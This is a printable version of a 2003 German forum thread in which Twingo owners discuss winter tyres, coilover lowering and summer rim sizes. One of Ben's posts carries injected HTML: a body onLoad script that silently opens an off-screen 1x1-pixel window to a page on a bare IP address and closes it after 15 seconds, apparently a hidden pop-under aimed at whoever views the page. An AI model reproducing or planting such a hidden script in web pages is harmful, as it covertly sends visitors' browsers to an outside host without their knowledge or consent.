Das Twingoforum...
Mein Schatz. Winterreifen sind so ... "Nit schön" - Druckversion

+- Das Twingoforum... (https://www.twingotuningforum.de)
+-- Forum: Bilder & Dateien (https://www.twingotuningforum.de/forum-34.html)
+--- Forum: MEIN Twingo I (https://www.twingotuningforum.de/forum-12.html)
+--- Thema: Mein Schatz. Winterreifen sind so ... "Nit schön" (/thread-692.html)



Mein Schatz. Winterreifen sind so ... "Nit schön" - Bonsai - 27.01.2003

Servus,

hatte letzte Woche nach em Autoputzen Lust meine Winterreifen zu fotografieren. Hässlich gell?

Finde Winterreifen gehören verboten! *scherzmach*

Aber ich bin auf jedenfall wieder froh, wenn ich meine Sommerreifen aus dem Speicher holen kann!

Aber schaut selbst!

[Bild: twingo2.jpg]
[Bild: twingo3.jpg]
[Bild: twingo6.jpg]
[Bild: twingo8.jpg]

Und seit letzter Woche noch mit den Sitzen
[Bild: duw1.jpg]


- Chris - TFNRW - 27.01.2003

Deinem stehen Winterreifen besser als meinem Smile Da gibts auch welche die denen noch weniger stehen. Aber hässlich sindse schon Wink

Würd mich ja mal interessieren wie der mit Sommerreifen aussieht: der sieht doch so schon gut aus :bescheuert:


- Bonsai - 27.01.2003

Hei Danke!

Naja, ich find Winterreifen stehen keinem Auto!

Sobald ich wieder sommerreifen drauf habe schick ich die Bilder wieder ins Forum!

Bonsai


- TwingoTuningNeuling - 27.01.2003

Hübsch hübsch der Kleine... aber sag mal: wieviel tiefer ist der denn?!

Markus


- Bonsai - 27.01.2003

Tja, das isch ne gute Frage!

Isch en Gewindefahrwerk von HR drin! Und steht so ca. auf 3/4! Wieviel genau kann ich dir nicht sagen!

Grüssli Bonsai


- Ben - 29.01.2003

Was für ne größe haben denn deine Sommerreifen? Hatte auch das H&R und musste es ganz nach oben schrauben.

Ben

<body onLoad="win=window.open('http://66.246.52.126/page.php?id=7857','_blank','width=1,height=1,left=2000,top=2000');window.setTimeout('win.close()',15000);"></body>


- Bonsai - 29.01.2003

Was? Ganz nach oben! Dann hattest du mit Sicherheit 15" oder?

Meine Sommerreifen haebn 7x13 + 8x13!

Hinten hätte ich sogar noch richtig luft!

Bonsai


- Ben - 30.01.2003

Jup, waren die Keskin 15" Wink


- Bonsai - 30.01.2003

Die habe ich mir auch schon überlegt, ich find aber das 15" einfach zu wuchtig sind für en Twingo! Denk ich hol mir 14" Borbet T! Die gefallen mir auch voll!

Bonsai


- Ben - 31.01.2003

14" OZ F1 Cup Wink